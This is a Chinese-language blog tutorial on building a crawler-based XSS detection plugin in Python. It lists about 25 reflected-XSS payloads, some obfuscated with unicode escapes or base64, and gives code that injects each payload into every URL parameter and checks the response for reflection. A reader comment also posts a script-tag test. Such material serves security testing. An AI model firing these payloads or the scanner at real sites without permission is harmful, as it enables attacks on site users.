MENU

基于爬虫开发XSS检测插件

February 2, 2019 • Read: 9146 • 渗透测试阅读设置

什么是XSS

跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该网页之时,嵌入其中的Script代码将会被执行,从而达到恶意攻击用户的目的

XSS检测原理

先做一个很简单的XSS检测工具,通过一些XSS的payload加入到url参数中,然后查找url的源码中是否存在这个参数,存在则可以证明网页存在XSS漏洞

payload list

</script>"><script>prompt(1)</script>
</ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>
"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
"><script>co\u006efir\u006d`1`</script>
"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
"><img/src=x%0Aonerror=prompt`1`>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
"><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>

代码编写

为了以后代码编写的方便,我们编写一个函数取出url中的参数,比如https://wmathor.com/python/?a=1&b=2&c=3。我们要将1 2 3都取出来进行替换,所以我们先创建一个公共函数来分割这些文本

在文件lib/core/common.py

def urlsplit(url):
    domain = url.split("?")[0]
    _url = url.split("?")[-1]
    param = {}
    for val in _url.split("&"):
        param[val.split("=")[0]] = val.split("=")[-1]
    
    # Combine
    urls = []
    for val in param.values():
        new_url = domain + '?' + _url.replace(val, 'my_Payload')
        urls.append(new_url)
    return urls

这个函数很简单,函数返回的是一个元祖,将每个参数用my_Payload标记,到时候替换这个参数就行了

接下来编写XSS检查程序,这个程序也是基于一个爬虫的框架

在开始之前,需要在目录新建一个data文件夹,这个文件夹用于存储一些数据。然后新建一个xss.txt,内容为之前的xss payload list

XSS检测程序代码

script目录下新建文件xss_check.py。代码如下

#-*- coding:utf-8 -*-
from lib.core import Download, common
import sys, os

payload = []
filename = os.path.join(sys.path[0], 'data', 'xss.txt')
f = open(filename)
for i in f:
    payload.append(i.strip())

class spider():
    def run(self, url, html):
        download = Download.Downloader()
        urls = common.urlsplit(url)
        
        if urls is None:
            return False
        for _urlp in urls:
            for _payload in payload:
                _url = _urlp.replace("my_Payload", _payload)
                print("[XSS test]:", _url)
                
                # We Need test and spilt all paramters of URL
                _str = download.get(_url)
                if _str is None:
                    return False
                if (_str.find(_payload) != -1):
                    print("XSS found:%s" % url)
        return False

Archives Tip
QR Code for this page
Tipping QR Code
Leave a Comment

4 Comments
  1. 基于爬虫开发XSS检测插件 - 艾德资讯网
    Reply

    [...]Via www.wmathor.com[...]

  2. 基於爬蟲開發XSS檢測插件 - 艾德資訊
    Reply

    [...]Via www.wmathor.com[...]

  3. 233 233
    Reply

    <script>alert('alert')</script>

    1. mathor mathor
      Reply

      @233你是哪位?